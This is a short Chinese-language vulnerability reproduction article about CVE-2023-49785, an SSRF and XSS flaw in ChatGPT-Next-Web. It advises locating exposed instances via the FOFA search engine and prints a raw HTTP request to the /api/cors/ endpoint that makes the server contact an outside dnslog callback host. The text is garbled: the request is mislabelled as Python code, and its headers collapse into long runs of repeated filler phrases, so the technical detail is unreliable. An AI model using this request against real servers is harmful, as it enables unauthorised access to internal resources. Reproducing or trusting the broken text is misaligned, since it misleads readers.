ChatGPT-Next-Web SSRF漏洞+XSS漏洞复现(CVE-2023-49785)

摘要：近期发现的ChatGPT-Next-Web存在SSRF漏洞和XSS漏洞（CVE-2023-49785），允许攻击者利用这些漏洞进行攻击。SSRF漏洞允许攻击者通过Web页面访问内部资源，而XSS漏洞则允许攻击者在目标网站上注入恶意代码。研究人员已经成功复现了这一漏洞，并提醒用户注意防范相关风险，避免遭受攻击。

ChatGPT-Next-Web是一款基于OpenAI的GPT-3.5和GPT-4.0语言模型的Web聊天机器人产品，它旨在为用户提供自然、流畅的语言交互和智能对话体验。

漏洞概述

在2024年3月，互联网上发现了针对ChatGPT-Next-Web的CVE-2023-49785漏洞，该漏洞涉及SSRF（Server-Side Request Forgery）和XSS（Cross-Site Scripting），未经身份验证的攻击者可利用此漏洞构造恶意请求，获取系统内部敏感信息及配置文件，从而造成信息泄露。

复现环境

为了快速识别目标环境，可以使用FOFA搜索引擎，搜索条件为应用名称包含“ChatGPT-Next-Web”。

漏洞复现

为了复现这一SSRF漏洞，可以使用以下Python示例代码（SSRF-PoC）：

GET /api/cors/http://nextchat.2222222222.pb0e92.dnslog.cn# HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/版本号（实际使用的Chrome版本） Safari/版本号（实际使用的Safari版本）
Accept: text/html,application/xhtml+xml,application/xml等（根据需要设置）
Accept-Encoding: gzip, deflate, br
Accept-Language: zh-CN,zh;q=0.9,en;q=0.8等（根据实际需求设置）等其它HTTP头部信息（根据实际情况添加）等其它参数（根据实际情况添加）等其它内容（根据实际情况添加）等其它内容（根据实际情况添加）等其它请求内容（根据实际情况填写）等其它请求参数（根据实际情况填写）等其它细节（根据实际情况调整）等，确保请求符合实际的攻击场景和需求，注意替换其中的URL和参数为实际的目标地址和参数，确保请求符合实际的攻击场景和需求。

这只是一个示例代码片段，实际使用时需要根据具体情况进行调整和完善，进行漏洞复现时请确保遵守相关法律法规和道德准则，仅在获得授权的情况下进行合法合规的测试。